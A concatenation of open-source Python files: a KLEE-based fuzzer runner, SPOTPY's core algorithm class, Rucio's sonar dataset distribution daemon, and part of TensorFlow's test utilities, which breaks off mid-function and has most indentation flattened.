ktest_tool = os.path.join(out_dir, 'bin/ktest-tool')
output_klee = os.path.join(out_dir, 'output_klee')
crash_dir = os.path.join(output_corpus, 'crashes')
input_klee = os.path.join(out_dir, 'seeds_klee')
queue_dir = os.path.join(output_corpus, 'queue')
info_dir = os.path.join(output_corpus, 'info')
emptydir(crash_dir)
emptydir(queue_dir)
emptydir(info_dir)
emptydir(input_klee)
rmdir(output_klee)
n_converted = convert_seed_inputs(ktest_tool, input_klee, input_corpus)
# Run KLEE
# Option -only-output-states-covering-new makes
# dumping ktest files faster.
# New coverage means a new edge.
# See lib/Core/StatsTracker.cpp:markBranchVisited()
# Start converting thread.
print('[run_fuzzer] Starting converting thread')
converting_thread = threading.Thread(target=convert_outputs,
args=(ktest_tool, output_klee,
crash_dir, queue_dir, info_dir))
converting_thread.start()
print('[run_fuzzer] Starting resource monitoring thread')
monitoring_thread = threading.Thread(target=monitor_resource_usage)
monitoring_thread.start()
print('[run_fuzzer] Running target with klee')
klee_bin = os.path.join(out_dir, 'bin/klee')
target_binary_bc = '{}.bc'.format(target_binary)
max_time_seconds = (
int(os.getenv('MAX_TOTAL_TIME', str(MAX_TOTAL_TIME_DEFAULT))) * 4) // 5
seeds_option = ['-zero-seed-extension', '-seed-dir', input_klee
] if n_converted > 0 else []
llvm_link_libs = []
for filename in get_bc_files():
llvm_link_libs.append('-link-llvm-lib=./{lib_bc}/{filename}'.format(
lib_bc=LIB_BC_DIR, filename=filename))
max_memory_mb = str(int(psutil.virtual_memory().available // 10**6 * 0.9))
klee_cmd = [
klee_bin,
'-always-output-seeds',
'-max-memory',
max_memory_mb,
'-max-solver-time',
f'{MAX_SOLVER_TIME_SECONDS}s',
'-log-timed-out-queries',
'-max-time',
f'{max_time_seconds}s',
'-libc',
'uclibc',
'-libcxx',
'-posix-runtime',
'-disable-verify', # Needed because debug builds don't always work.
'-output-dir',
output_klee,
]
klee_cmd.extend(llvm_link_libs)
if seeds_option:
klee_cmd.extend(seeds_option)
size = get_size_for_benchmark()
klee_cmd += [target_binary_bc, str(size)]
run(klee_cmd, ulimit_cmd='ulimit -s unlimited')
# Klee has now terminated.
print('[run_fuzzer] Klee has terminated.')
# Give the converting thread enough time to complete.
n_ktest = len(glob.glob(os.path.join(output_klee, '*.ktest')))
n_converted = len(os.listdir(queue_dir)) + len(os.listdir(crash_dir))
print(
'[run_fuzzer] {ktests} ktests and {converted} converted files.'.format(
ktests=n_ktest, converted=n_converted))
while n_ktest != n_converted:
time.sleep(30)
n_converted = len(os.listdir(queue_dir)) + len(os.listdir(crash_dir))
# Let's log the end.
print('[run_fuzzer] Main thread terminated successfully.')
|
_algorithm.py
|
'''
Copyright (c) 2018 by Tobias Houska
This file is part of Statistical Parameter Optimization Tool for Python(SPOTPY).
:author: Tobias Houska
This file holds the standards for every algorithm.
'''
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from spotpy import database
from spotpy import parameter
import numpy as np
import time
import threading
import inspect
import sys
try:
from queue import Queue
except ImportError:
    # On Python 2 only the multiprocessing Queue class is available. With it, the main process has to
    # sleep for a moment so that the subprocess can finish and be garbage collected; this slows the
    # whole simulation down, but the workaround is not needed on Python 3.
from Queue import Queue
class _RunStatistic(object):
"""
this class checks for each run if the objectivefunction got better and holds the
best parameter set.
Every _algorithm has an object of this class as status.
Usage:
    status = _RunStatistic(repetitions, algorithm_name, optimization_direction, parnames)
    status(objectivefunction, params)
"""
def __init__(self, repetitions, algorithm_name, optimization_direction, parnames):
        self.optimization_direction = optimization_direction  # grid, maximize, minimize
print('Initializing the ',algorithm_name,' with ',repetitions,' repetitions')
if optimization_direction == 'minimize':
self.compare = self.minimizer
print('The objective function will be minimized')
if optimization_direction == 'maximize':
self.compare = self.maximizer
            print('The objective function will be maximized')
if optimization_direction == 'grid':
self.compare = self.grid
self.rep = 0
self.parnames = parnames
self.parameters= len(parnames)
self.params_min = [np.nan]*self.parameters
self.params_max = [np.nan]*self.parameters
self.objectivefunction_min = 1e308
self.objectivefunction_max = -1e308
self.starttime = time.time()
self.last_print = time.time()
self.repetitions = repetitions
self.stop = False
def minimizer(self, objval, params):
if objval < self.objectivefunction_min:
self.objectivefunction_min = objval
self.params_min = list(params)
def maximizer(self, objval, params):
if objval > self.objectivefunction_max:
self.objectivefunction_max = objval
self.params_max = list(params)
def grid(self, objval, params):
if objval < self.objectivefunction_min:
self.objectivefunction_min = objval
self.params_min = list(params)
if objval > self.objectivefunction_max:
self.objectivefunction_max = objval
self.params_max = list(params)
def __call__(self, objectivefunction, params, block_print=False):
self.rep+=1
if type(objectivefunction) == type([]): #TODO: change to iterable
self.compare(objectivefunction[0], params)
elif type(objectivefunction) == type(np.array([])):
pass
else:
self.compare(objectivefunction, params)
if self.rep == self.repetitions:
self.stop = True
if not block_print:
self.print_status()
def print_status(self):
        # get str showing approximate time left to end of simulation in H, M, S
acttime = time.time()
        # Refresh progressbar every two seconds
if acttime - self.last_print >= 2:
avg_time_per_run = (acttime - self.starttime) / (self.rep + 1)
timestr = time.strftime("%H:%M:%S", time.gmtime(round(avg_time_per_run * (self.repetitions - (self.rep + 1)))))
if self.optimization_direction == 'minimize':
text = '%i of %i, minimal objective function=%g, time remaining: %s' % (
self.rep, self.repetitions, self.objectivefunction_min, timestr)
if self.optimization_direction == 'maximize':
text = '%i of %i, maximal objective function=%g, time remaining: %s' % (
self.rep, self.repetitions, self.objectivefunction_max, timestr)
if self.optimization_direction == 'grid':
text = '%i of %i, min objf=%g, max objf=%g, time remaining: %s' % (
self.rep, self.repetitions, self.objectivefunction_min, self.objectivefunction_max, timestr)
print(text)
self.last_print = time.time()
def print_status_final(self):
print('\n*** Final SPOTPY summary ***')
print('Total Duration: ' + str(round((time.time() - self.starttime), 2)) + ' seconds')
print('Total Repetitions:', self.rep)
if self.optimization_direction == 'minimize':
print('Minimal objective value: %g' % (self.objectivefunction_min))
print('Corresponding parameter setting:')
for i in range(self.parameters):
text = '%s: %g' % (self.parnames[i], self.params_min[i])
print(text)
if self.optimization_direction == 'maximize':
print('Maximal objective value: %g' % (self.objectivefunction_max))
print('Corresponding parameter setting:')
for i in range(self.parameters):
text = '%s: %g' % (self.parnames[i], self.params_max[i])
print(text)
if self.optimization_direction == 'grid':
print('Minimal objective value: %g' % (self.objectivefunction_min))
print('Corresponding parameter setting:')
for i in range(self.parameters):
text = '%s: %g' % (self.parnames[i], self.params_min[i])
print(text)
print('Maximal objective value: %g' % (self.objectivefunction_max))
print('Corresponding parameter setting:')
for i in range(self.parameters):
text = '%s: %g' % (self.parnames[i], self.params_max[i])
print(text)
print('******************************\n')
def __repr__(self):
return 'Min objectivefunction: %g \n Max objectivefunction: %g' % (
self.objectivefunction_min, self.objectivefunction_max)
class _algorithm(object):
"""
Implements an algorithm.
Input
----------
spot_setup: class
model: function
Should be callable with a parameter combination of the parameter-function
            and return a list of simulation results (the same length as the evaluation list)
parameter: function
            When called, it should return a random parameter combination, which can
            be e.g. uniform or Gaussian.
objectivefunction: function
Should return the objectivefunction for a given list of a model simulation and
observation.
evaluation: function
            Should return the true values as returned by the model.
dbname: str
Name of the database where parameter, objectivefunction value and simulation
results will be saved.
dbformat: str
ram: fast suited for short sampling time. no file will be created and results are saved in an array.
csv: A csv file will be created, which you can import afterwards.
parallel: str
        seq: Sequential sampling (default): Normal iterations on one core of your cpu.
mpc: Multi processing: Iterations on all available cores on your (single) pc
        mpi: Message Passing Interface: Parallel computing on high performance computing clusters, mpi4py needs to be installed
save_threshold: float or list
Compares the given value/list of values with return value/list of values from spot_setup.objectivefunction.
If the objectivefunction value is higher, the results are saved in the database. If not they are ignored (saves storage).
db_precision:np.float type
set np.float16, np.float32 or np.float64 for rounding of floats in the output database
Default is np.float16
sim_timeout: float, int or None, default: None
the defined model given in the spot_setup class can be controlled to break after 'sim_timeout' seconds if
sim_timeout is not None.
        If the model run has been broken, simply '[nan]' will be returned.
random_state: int or None, default: None
the algorithms uses the number in random_state as seed for numpy. This way stochastic processes can be reproduced.
"""
_unaccepted_parameter_types = (parameter.List, )
def __init__(self, spot_setup, dbname=None, dbformat=None, dbinit=True,
dbappend=False, parallel='seq', save_sim=True, breakpoint=None,
backup_every_rep=100, save_threshold=-np.inf, db_precision=np.float16,
sim_timeout=None, random_state=None, optimization_direction='grid', algorithm_name=''):
# Initialize the user defined setup class
self.setup = spot_setup
param_info = parameter.get_parameters_array(self.setup, unaccepted_parameter_types=self._unaccepted_parameter_types)
self.all_params = param_info['random']
self.constant_positions = parameter.get_constant_indices(spot_setup)
if self.constant_positions:
self.non_constant_positions = []
for i, val in enumerate(self.all_params):
if self.all_params[i] not in self.constant_positions:
self.non_constant_positions.append(i)
else:
self.non_constant_positions = np.arange(0,len(self.all_params))
self.parameter = self.get_parameters
self.parnames = param_info['name']
self.algorithm_name = algorithm_name
# Create a type to hold the parameter values using a namedtuple
self.partype = parameter.ParameterSet(param_info)
self.evaluation = self.setup.evaluation()
self.save_sim = save_sim
self.optimization_direction = optimization_direction
self.dbname = dbname or 'customDb'
self.dbformat = dbformat or 'ram'
self.db_precision = db_precision
self.breakpoint = breakpoint
self.backup_every_rep = backup_every_rep
# Two parameters to control the data base handling
# 'dbinit' triggers the initial creation of the data base file
# 'dbappend' used to append to the existing data base, after restart
self.dbinit = dbinit
self.dbappend = dbappend
# Set the random state
        if random_state is None:  # ToDo: Have to discuss if these 3 lines are necessary.
random_state = np.random.randint(low=0, high=2**30)
np.random.seed(random_state)
        # If value is not None, a timeout will be set so that the simulation breaks after sim_timeout seconds without returning a value
self.sim_timeout = sim_timeout
self.save_threshold = save_threshold
if breakpoint == 'read' or breakpoint == 'readandwrite':
print('Reading backupfile')
try:
open(self.dbname+'.break')
except FileNotFoundError:
print('Backupfile not found')
self.dbappend = True
# Now a repeater (ForEach-object) is loaded
        # A repeater is a convenient wrapper to repeat tasks
# We have the same interface for sequential and for parallel tasks
if parallel == 'seq':
from spotpy.parallel.sequential import ForEach
elif parallel == 'mpi':
from spotpy.parallel.mpi import ForEach
        # MPC is based on pathos multiprocessing and uses an ordered map, so results are given back in the
        # same order as the parameters
elif parallel == 'mpc':
from spotpy.parallel.mproc import ForEach
        # UMPC is based on pathos multiprocessing and uses an unordered map: results are returned in the
        # order in which the subprocesses finish, which may speed up the whole simulation. It is not
        # recommended if the objective function depends on the order of the data, because the order of
        # the results is effectively random.
elif parallel == 'umpc':
from spotpy.parallel.umproc import ForEach
else:
raise ValueError(
"'%s' is not a valid keyword for parallel processing" % parallel)
# This is the repeater for the model runs. The simulate method does the work
# If you need different tasks, the repeater can be pushed into a "phase" using the
# setphase function. The simulate method can check the current phase and dispatch work
# to other functions. This is introduced for sceua to differentiate between burn in and
# the normal work on the chains
self.repeat = ForEach(self.simulate)
# method "save" needs to know whether objective function result is list or float, default is float
self.like_struct_typ = type(1.1)
def __str__(self):
return '{type}({mtype}())->{dbname}'.format(
type=type(self).__name__,
mtype=type(self.setup).__name__,
dbname=self.dbname)
def __repr__(self):
return '{type}()'.format(type=type(self).__name__)
def get_parameters(self):
"""
Returns the parameter array from the setup
"""
pars = parameter.get_parameters_array(self.setup)
return pars[self.non_constant_positions]
def set_repetiton(self, repetitions):
self.status = _RunStatistic(repetitions, self.algorithm_name,
self.optimization_direction, self.parnames)
# In MPI, this command will do nothing on the master process
# but the worker processes are going to wait for jobs.
# Hence the workers will only receive parameters for the
# simulate function, new calculation phases and the termination
self.repeat.start()
def final_call(self):
self.repeat.terminate()
try:
self.datawriter.finalize()
except AttributeError: # Happens if no database was assigned
pass
self.status.print_status_final()
def _init_database(self, like, randompar, simulations):
if self.dbinit:
print('Initialize database...')
self.datawriter = database.get_datawriter(self.dbformat,
self.dbname, self.parnames, like, randompar, simulations,
save_sim=self.save_sim, dbappend=self.dbappend,
dbinit=self.dbinit, db_precision=self.db_precision,
setup=self.setup)
self.dbinit = False
def __is_list_type(self, data):
if type(data) == type:
return data == list or data == type(np.array([]))
else:
return type(data) == list or type(data) == type(np.array([]))
def save(self, like, randompar, simulations, chains=1):
# Initialize the database if no run was performed so far
self._init_database(like, randompar, simulations)
if self.__is_list_type(self.like_struct_typ) and self.__is_list_type(self.save_threshold):
if all(i > j for i, j in zip(like, self.save_threshold)): #Compares list/list
self.datawriter.save(like, randompar, simulations, chains=chains)
if not self.__is_list_type(self.like_struct_typ) and not self.__is_list_type(self.save_threshold):
if like>self.save_threshold: #Compares float/float
self.datawriter.save(like, randompar, simulations, chains=chains)
if self.__is_list_type(self.like_struct_typ) and not self.__is_list_type(self.save_threshold):
if like[0]>self.save_threshold: #Compares list/float
self.datawriter.save(like, randompar, simulations, chains=chains)
if not self.__is_list_type(self.like_struct_typ) and self.__is_list_type(self.save_threshold): #Compares float/list
            if (like > self.save_threshold).all():  # .all() must be called; the bare method object is always truthy
self.datawriter.save(like, randompar, simulations, chains=chains)
def read_breakdata(self, dbname):
''' Read data from a pickle file if a breakpoint is set.
Reason: In case of incomplete optimizations, old data can be restored. '''
import pickle
with open(dbname+'.break', 'rb') as breakfile:
work,backuptime,repos,obmin,obmax=pickle.load(breakfile)
self.status.starttime=self.status.starttime-backuptime
self.status.rep=repos
self.status.objectivefunction_min=obmin
self.status.objectivefunction_max=obmax
return work
def write_breakdata(self, dbname, work):
''' Write data to a pickle file if a breakpoint has been set.'''
import pickle
work=(work,self.status.last_print-self.status.starttime,self.status.rep,self.status.objectivefunction_min,self.status.objectivefunction_max)
with open(str(dbname)+'.break', 'wb') as breakfile:
pickle.dump(work, breakfile)
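    # The pickled breakpoint tuple written above (and unpacked in read_breakdata) is
    #   (work, seconds_elapsed_at_last_print, repetitions_done,
    #    objectivefunction_min, objectivefunction_max)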
def getdata(self):
return self.datawriter.getdata()
def update_params(self, params):
#Add potential Constant parameters
self.all_params[self.non_constant_positions] = params
return self.all_params
    def postprocessing(self, rep, params, simulation, chains=1, save_run=True, negativlike=False, block_print=False):  # TODO: rep not necessary
params = self.update_params(params)
if negativlike is True:
like = -self.getfitness(simulation=simulation, params=params)
else:
like = self.getfitness(simulation=simulation, params=params)
# Save everything in the database, if save is True
# This is needed as some algorithms just want to know the fitness,
# before they actually save the run in a database (e.g. sce-ua)
self.status(like,params,block_print=block_print)
if save_run is True and simulation is not None:
self.save(like, params, simulations=simulation, chains=chains)
if type(like)==type([]):
return like[0]
else:
return like
def getfitness(self, simulation, params):
"""
Calls the user defined spot_setup objectivefunction
"""
try:
#print('Using parameters in fitness function')
return self.setup.objectivefunction(evaluation=self.evaluation, simulation=simulation, params = (params,self.parnames))
except TypeError: # Happens if the user does not allow to pass parameter in the spot_setup.objectivefunction
#print('Not using parameters in fitness function')
return self.setup.objectivefunction(evaluation=self.evaluation, simulation=simulation)
def simulate(self, id_params_tuple):
"""This is a simple wrapper of the model, returning the result together with
the run id and the parameters. This is needed, because some parallel things
can mix up the ordering of runs
"""
id, params = id_params_tuple
self.all_params[self.non_constant_positions] = params #TODO: List parameters are not updated if not accepted for the algorithm, we may have to warn/error if list is given
all_params = self.all_params
# we need a layer to fetch returned data from a threaded process into a queue.
def model_layer(q,all_params):
# Call self.model with a namedtuple instead of another sequence
q.put(self.setup.simulation(self.partype(*all_params)))
        # Start a queue. On Python 2.7 this is a multiprocessing class, which can cause errors due to
        # incompatibility with the main thread, so a workaround is needed only for older Python versions.
que = Queue()
sim_thread = threading.Thread(target=model_layer, args=(que, all_params))
sim_thread.daemon = True
sim_thread.start()
# If self.sim_timeout is not None the self.model will break after self.sim_timeout seconds otherwise is runs as
# long it needs to run
sim_thread.join(self.sim_timeout)
        # If the thread produced no result, i.e. it was killed by the timeout watcher, model_result stays
        # None and the run will not be saved; otherwise fetch the result from the queue
model_result = None
if not que.empty():
model_result = que.get()
return id, params, model_result
|
distribution_daemon.py
|
# -*- coding: utf-8 -*-
# Copyright 2017-2021 CERN
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Authors:
# - Vitjan Zavrtanik <vitjan.zavrtanik@cern.ch>, 2017
# - Vincent Garonne <vgaronne@gmail.com>, 2017-2018
# - Mario Lassnig <mario.lassnig@cern.ch>, 2018
# - Eric Vaandering <ewv@fnal.gov>, 2020
# - Benedikt Ziemons <benedikt.ziemons@cern.ch>, 2020-2021
# - Thomas Beermann <thomas.beermann@cern.ch>, 2021
"""
Daemon for distributing sonar test files to available RSE's
"""
import glob
import logging
import os
import subprocess
import threading
import time
import rucio.db.sqla.util
from rucio.client.client import Client
from rucio.common import exception
from rucio.common.config import config_get
from rucio.common.exception import DuplicateRule, InsufficientAccountLimit, RSEBlacklisted, RSEWriteBlocked, ReplicationRuleCreationTemporaryFailed
from rucio.common.logging import setup_logging
GRACEFUL_STOP = threading.Event()
def rename_files(tdir, pattern, new_name):
"""
Renames the files in the dataset according to the RSE
on which the dataset is being replicated.
"""
for cnt, file_name in enumerate(glob.iglob(os.path.join(tdir, pattern))):
logging.info(file_name)
logging.info(new_name + str(cnt) + '.rnd')
if not os.path.isfile(os.path.join(tdir, new_name + str(cnt) + '.rnd')):
logging.info("renaming..")
os.rename(file_name, os.path.join(tdir, new_name + str(cnt) + '.rnd'))
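# For example (paths and RSE name are purely illustrative):
#   rename_files('small_sonar_dataset', '*.rnd', 'sonar.test.small.SOME_SCRATCHDISK.file')
# turns the matched files into sonar.test.small.SOME_SCRATCHDISK.file0.rnd,
# sonar.test.small.SOME_SCRATCHDISK.file1.rnd, ... inside the same directory.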
def distribute_files(client, data_dir='small_sonar_dataset', dataset_prefix='sonar.test.small.', scope='user.vzavrtan', num_files=1):
"""
    Check whether the RSE's already contain their respective sonar test dataset
and distributes the dataset to the ones that do not. Also checks whether the
RSE's are available for distribution.
param: data_dir - path to the folder which contains the dataset
param: dataset_prefix - the prefix of the dataset ex. sonar.test.small.AGLT2_SCRATCHDISK = prefix.RSE
param: num_files - number of files in the dataset
"""
logging.info("Running disribution iteration")
# remove the "if '_SCRATCHDISK'" for use on other RSE's
endpoint_names = [x['rse'] for x in client.list_rses() if '_SCRATCHDISK' in x['rse'] and x['availability'] == 7]
ready = []
rules = client.list_account_rules(account='vzavrtan')
for rule in rules:
if dataset_prefix in rule['name'] and rule['rse_expression'] in rule['name'] and rule['state'] == 'OK' and rule['locks_ok_cnt'] == num_files:
ready.append(rule['rse_expression'])
ready = list(set(ready))
for site in endpoint_names:
if GRACEFUL_STOP.is_set():
break
if site not in ready:
rename_files(data_dir, '*.rnd', dataset_prefix + site + '.file')
msg = "Uploading to %s " % (site)
logging.info(msg)
process = subprocess.Popen(['rucio', 'upload', data_dir, '--rse', site], stdout=subprocess.PIPE)
process.communicate()
msg = "Adding dataset %s " % (dataset_prefix + site)
logging.info(msg)
try:
client.add_dataset('user.vzavrtan', dataset_prefix + site)
except Exception as exception:
logging.warning("Error adding dataset: " + str(exception))
for file_name in glob.iglob(os.path.join(data_dir, '*.rnd')):
logging.info('Attaching to dataset:' + dataset_prefix + site + ' ' + scope + ':' + os.path.basename(file_name))
try:
client.attach_dids(scope, dataset_prefix + site, [{'scope': scope, 'name': os.path.basename(file_name)}])
except Exception as exception:
logging.warning('Error attaching dids: ' + str(exception))
logging.info('Adding rule for dataset')
try:
client.add_replication_rule([{'scope': scope, 'name': dataset_prefix + site}], 1, site)
except (DuplicateRule, RSEBlacklisted, RSEWriteBlocked, ReplicationRuleCreationTemporaryFailed,
InsufficientAccountLimit) as exception:
msg = 'Error adding replication rule: %s' % (str(exception))
logging.warning(msg)
else:
msg = "%s is already replicated." % (site)
logging.info(msg)
def run_distribution():
"""
    Roughly every 12 hours (one 3600-second sleep per loop iteration, distributing on
    every 12th iteration) tries to distribute the datasets to RSE's that are missing them.
"""
client = Client()
counter = 0
dataset_dir = config_get('sonar', 'dataset_dir')
dataset_prefix = config_get('sonar', 'dataset_prefix')
scope = config_get('sonar', 'scope')
num_files = 10
while not GRACEFUL_STOP.is_set():
if counter % 12 == 0:
distribute_files(client, data_dir=dataset_dir, dataset_prefix=dataset_prefix, scope=scope, num_files=num_files)
time.sleep(3600)
counter += 1
def run():
"""
Runs the distribution daemon
"""
setup_logging()
if rucio.db.sqla.util.is_old_db():
raise exception.DatabaseException('Database was not updated, daemon won\'t start')
thread = threading.Thread(target=run_distribution, kwargs={})
thread.start()
while thread and thread.is_alive():
thread.join(timeout=3.14)
def stop(signum=None, frame=None):
"""
Stops the distribution daemon
"""
log_msg = 'Stopping distribution daemon: %s %s' % (signum, frame)
logging.info(log_msg)
GRACEFUL_STOP.set()
|
test_util.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# pylint: disable=invalid-name
"""Test utils for tensorflow."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import contextlib
import gc
import math
import random
import re
import tempfile
import threading
import numpy as np
import six
_portpicker_import_error = None
try:
import portpicker # pylint: disable=g-import-not-at-top
except ImportError as _error:
_portpicker_import_error = _error
portpicker = None
# pylint: disable=g-import-not-at-top
from google.protobuf import descriptor_pool
from google.protobuf import text_format
from tensorflow.core.framework import graph_pb2
from tensorflow.core.protobuf import config_pb2
from tensorflow.core.protobuf import rewriter_config_pb2
from tensorflow.python import pywrap_tensorflow
from tensorflow.python.client import device_lib
from tensorflow.python.client import session
from tensorflow.python.eager import backprop
from tensorflow.python.eager import context
from tensorflow.python.eager import tape
from tensorflow.python.framework import device as pydev
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.framework import random_seed
from tensorflow.python.framework import versions
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import googletest
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.training import server_lib
from tensorflow.python.util import compat
from tensorflow.python.util import nest
from tensorflow.python.util.protobuf import compare
def gpu_device_name():
"""Returns the name of a GPU device if available or the empty string."""
for x in device_lib.list_local_devices():
if x.device_type == "GPU" or x.device_type == "SYCL":
return compat.as_str(x.name)
return ""
def assert_ops_in_graph(expected_ops, graph):
"""Assert all expected operations are found.
Args:
expected_ops: `dict<string, string>` of op name to op type.
graph: Graph to check.
Returns:
`dict<string, node>` of node name to node.
Raises:
ValueError: If the expected ops are not present in the graph.
"""
actual_ops = {}
gd = graph.as_graph_def()
for node in gd.node:
if node.name in expected_ops:
if expected_ops[node.name] != node.op:
raise ValueError("Expected op for node %s is different. %s vs %s" %
(node.name, expected_ops[node.name], node.op))
actual_ops[node.name] = node
if set(expected_ops.keys()) != set(actual_ops.keys()):
raise ValueError("Not all expected ops are present. Expected %s, found %s" %
(expected_ops.keys(), actual_ops.keys()))
return actual_ops
def assert_equal_graph_def(actual, expected, checkpoint_v2=False):
"""Asserts that two `GraphDef`s are (mostly) the same.
Compares two `GraphDef` protos for equality, ignoring versions and ordering of
nodes, attrs, and control inputs. Node names are used to match up nodes
between the graphs, so the naming of nodes must be consistent.
Args:
actual: The `GraphDef` we have.
expected: The `GraphDef` we expected.
checkpoint_v2: boolean determining whether to ignore randomized attribute
values that appear in V2 checkpoints.
Raises:
AssertionError: If the `GraphDef`s do not match.
TypeError: If either argument is not a `GraphDef`.
"""
if not isinstance(actual, graph_pb2.GraphDef):
raise TypeError("Expected tf.GraphDef for actual, got %s" %
type(actual).__name__)
if not isinstance(expected, graph_pb2.GraphDef):
raise TypeError("Expected tf.GraphDef for expected, got %s" %
type(expected).__name__)
if checkpoint_v2:
_strip_checkpoint_v2_randomized(actual)
_strip_checkpoint_v2_randomized(expected)
diff = pywrap_tensorflow.EqualGraphDefWrapper(actual.SerializeToString(),
expected.SerializeToString())
if diff:
raise AssertionError(compat.as_str(diff))
def assert_meta_graph_protos_equal(tester, a, b):
"""Compares MetaGraphDefs `a` and `b` in unit test class `tester`."""
# Carefully check the collection_defs
tester.assertEqual(set(a.collection_def), set(b.collection_def))
collection_keys = a.collection_def.keys()
for k in collection_keys:
a_value = a.collection_def[k]
b_value = b.collection_def[k]
proto_type = ops.get_collection_proto_type(k)
if proto_type:
a_proto = proto_type()
b_proto = proto_type()
# Number of entries in the collections is the same
tester.assertEqual(len(a_value.bytes_list.value),
len(b_value.bytes_list.value))
for (a_value_item, b_value_item) in zip(
a_value.bytes_list.value,
b_value.bytes_list.value):
a_proto.ParseFromString(a_value_item)
b_proto.ParseFromString(b_value_item)
tester.assertProtoEquals(a_proto, b_proto)
else:
      tester.assertEqual(a_value, b_value)
# Compared the fields directly, remove their raw values from the
# proto comparison below.
a.ClearField("collection_def")
b.ClearField("collection_def")
# Check the graph_defs.
assert_equal_graph_def(a.graph_def, b.graph_def, checkpoint_v2=True)
# Check graph_def versions (ignored by assert_equal_graph_def).
tester.assertProtoEquals(a.graph_def.versions, b.graph_def.versions)
# Compared the fields directly, remove their raw values from the
# proto comparison below.
a.ClearField("graph_def")
b.ClearField("graph_def")
tester.assertProtoEquals(a, b)
# Matches attributes named via _SHARDED_SUFFIX in
# tensorflow/python/training/saver.py
_SHARDED_SAVE_OP_PATTERN = "_temp_[0-9a-z]{32}/part"
def _strip_checkpoint_v2_randomized(graph_def):
for node in graph_def.node:
delete_keys = []
for attr_key in node.attr:
attr_tensor_value = node.attr[attr_key].tensor
if attr_tensor_value and len(attr_tensor_value.string_val) == 1:
attr_tensor_string_value = attr_tensor_value.string_val[0]
if (attr_tensor_string_value and
re.match(_SHARDED_SAVE_OP_PATTERN, str(attr_tensor_string_value))):
delete_keys.append(attr_key)
for attr_key in delete_keys:
del node.attr[attr_key]
def IsGoogleCudaEnabled():
return pywrap_tensorflow.IsGoogleCudaEnabled()
def CudaSupportsHalfMatMulAndConv():
return pywrap_tensorflow.CudaSupportsHalfMatMulAndConv()
def InstallStackTraceHandler():
pywrap_tensorflow.InstallStacktraceHandler()
def NHWCToNCHW(input_tensor):
"""Converts the input from the NHWC format to NCHW.
Args:
input_tensor: a 4- or 5-D tensor, or an array representing shape
Returns:
converted tensor or shape array
"""
# tensor dim -> new axis order
new_axes = {
4: [0, 3, 1, 2],
5: [0, 4, 1, 2, 3]
}
if isinstance(input_tensor, ops.Tensor):
ndims = input_tensor.shape.ndims
return array_ops.transpose(input_tensor, new_axes[ndims])
else:
ndims = len(input_tensor)
return [input_tensor[a] for a in new_axes[ndims]]
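# Shape-only example (no TensorFlow session needed, since plain lists are accepted):
#   >>> NHWCToNCHW([32, 28, 28, 3])
#   [32, 3, 28, 28]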
def NHWCToNCHW_VECT_C(input_shape_or_tensor):
"""Transforms the input from the NHWC layout to NCHW_VECT_C layout.
Note: Does not include quantization or type conversion steps, which should
be applied afterwards.
Args:
input_shape_or_tensor: a 4- or 5-D tensor, or an array representing shape
Returns:
tensor or shape array transformed into NCHW_VECT_C
Raises:
ValueError: if last dimension of `input_shape_or_tensor` is not evenly
divisible by 4.
"""
permutations = {5: [0, 3, 1, 2, 4], 6: [0, 4, 1, 2, 3, 5]}
is_tensor = isinstance(input_shape_or_tensor, ops.Tensor)
temp_shape = (input_shape_or_tensor.shape.as_list()
if is_tensor else input_shape_or_tensor)
if temp_shape[-1] % 4 != 0:
raise ValueError(
"Last dimension of input must be evenly divisible by 4 to convert to "
"NCHW_VECT_C.")
temp_shape[-1] //= 4
temp_shape.append(4)
permutation = permutations[len(temp_shape)]
if is_tensor:
t = array_ops.reshape(input_shape_or_tensor, temp_shape)
return array_ops.transpose(t, permutation)
else:
return [temp_shape[a] for a in permutation]
def NCHW_VECT_CToNHWC(input_shape_or_tensor):
"""Transforms the input from the NCHW_VECT_C layout to NHWC layout.
Note: Does not include de-quantization or type conversion steps, which should
be applied beforehand.
Args:
input_shape_or_tensor: a 5- or 6-D tensor, or an array representing shape
Returns:
tensor or shape array transformed into NHWC
Raises:
ValueError: if last dimension of `input_shape_or_tensor` is not 4.
"""
permutations = {5: [0, 2, 3, 1, 4], 6: [0, 2, 3, 4, 1, 5]}
is_tensor = isinstance(input_shape_or_tensor, ops.Tensor)
input_shape = (input_shape_or_tensor.shape.as_list()
if is_tensor else input_shape_or_tensor)
if input_shape[-1] != 4:
raise ValueError("Last dimension of NCHW_VECT_C must be 4.")
permutation = permutations[len(input_shape)]
nhwc_shape = [input_shape[a] for a in permutation[:-1]]
nhwc_shape[-1] *= input_shape[-1]
if is_tensor:
t = array_ops.transpose(input_shape_or_tensor, permutation)
return array_ops.reshape(t, nhwc_shape)
else:
return nhwc_shape
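# Shape round-trip sketch for the two VECT_C helpers above (list inputs, no tensors):
#   >>> NHWCToNCHW_VECT_C([32, 28, 28, 8])
#   [32, 2, 28, 28, 4]
#   >>> NCHW_VECT_CToNHWC([32, 2, 28, 28, 4])
#   [32, 28, 28, 8]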
def NCHWToNHWC(input_tensor):
"""Converts the input from the NCHW format to NHWC.
Args:
input_tensor: a 4- or 5-D tensor, or an array representing shape
Returns:
converted tensor or shape array
"""
# tensor dim -> new axis order
new_axes = {
4: [0, 2, 3, 1],
5: [0, 2, 3, 4, 1]
}
if isinstance(input_tensor, ops.Tensor):
ndims = input_tensor.shape.ndims
